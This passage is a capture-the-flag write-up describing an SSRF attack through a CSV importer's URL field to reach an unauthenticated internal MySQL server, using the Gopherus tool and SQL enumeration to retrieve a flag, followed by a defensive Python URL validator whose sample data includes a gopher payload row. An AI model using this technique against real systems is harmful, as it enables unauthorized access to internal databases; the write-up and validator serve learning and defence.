
While logged in as admin, we see a **messages** button, clicking that reveals

So `brian` has a **mysql** database that isn't password protected. Neat.
The server configuration confirms the existence of a **mysql** server.

Things we know:
1. brian has a mysql server that doesn't require a password
2. the mysql server is at `10.10.10.53:3306`
3. The server is vulnerable to **SSRF**

There's a tool called **gopherus** that is built for attacking things like **mysql** using **SSRF**. It will build a **gopher** link for us to use:

https://github.com/tarunkant/Gopherus

`gopherus --exploit mysql`

Adding that **gopher link** to our **CSV** and editing the **url** to match what it says in the config file (10.10.10.53), we get back:
```
Log:
Resp: shipmentID,arrival_date,catalogURL
Resp: SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA
invalid format!
Cannot import records!
```
More base64

Looks like there's a database called `webnote`. Using **gopherus** to issue these commands, we can enumerate the database:

1. `show databases;`
   - reveals the database `webnote`
2. `use webnote; show tables;`
   - reveals the table `settings`
3. `use webnote; select column_name from information_schema.columns where table_schema = 'webnote' and table_name = 'settings';`
   - reveals the columns `apikey` and `note`
4. `use webnote; select note from settings;`
   - gives the flag
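
As an added example (not part of the original write-up or the target application), this is the kind of check on the importer's URL column that refuses the gopher request used above before anything is fetched. It assumes `catalogURL` is the column the server fetches; the function names, the resolver hook, the port policy and the sample rows are assumptions, and only the CSV header and `10.10.10.53:3306` come from the page.

```python
import csv
import io
import ipaddress
from urllib.parse import urlsplit

ALLOWED = {"http": 80, "https": 443}   # scheme -> only port accepted (assumed policy)

def check_catalog_url(url, resolve):
    """Return None if the URL may be fetched, else the reason it is refused."""
    # resolve(host) -> list of IP strings; hypothetical hook so the check runs offline.
    try:
        parts = urlsplit(url.strip())
        port = parts.port              # raises ValueError on a non-numeric port
    except ValueError:
        return "malformed URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED:          # gopher:// and other non-web schemes stop here
        return f"scheme {scheme!r} not allowed"
    if not parts.hostname:
        return "no host"
    if port not in (None, ALLOWED[scheme]):
        return f"port {port} not allowed"
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]
    except ValueError:                 # a name, not an IP literal
        addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    if not addrs:
        return "host does not resolve"
    for addr in addrs:                 # every candidate address must be public
        if not addr.is_global:
            return f"{addr} is not a public address"
    # The fetcher must connect to the address checked here and re-check redirects.
    return None

def screen_import(csv_text, resolve):
    """Map shipmentID -> refusal reason for each row whose catalogURL fails."""
    rows = csv.DictReader(io.StringIO(csv_text))
    checked = {r["shipmentID"]: check_catalog_url(r["catalogURL"], resolve) for r in rows}
    return {sid: why for sid, why in checked.items() if why}

# Constructed sample rows and stub DNS answers (not from the challenge).
SAMPLE = """shipmentID,arrival_date,catalogURL
1001,2024-01-05,https://catalog.example/items/1001
1002,2024-01-06,gopher://10.10.10.53:3306/_PAYLOAD
1003,2024-01-07,http://10.10.10.53/
1004,2024-01-08,http://db.example/
"""
STUB_DNS = {"catalog.example": ["8.8.8.8"], "db.example": ["10.10.10.53"]}
```
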

`flag{bu7_50m37im3s_Y0u_N33d_i11usi0n}`

---
Tags: #ctf #web #ssrf #mysql #sql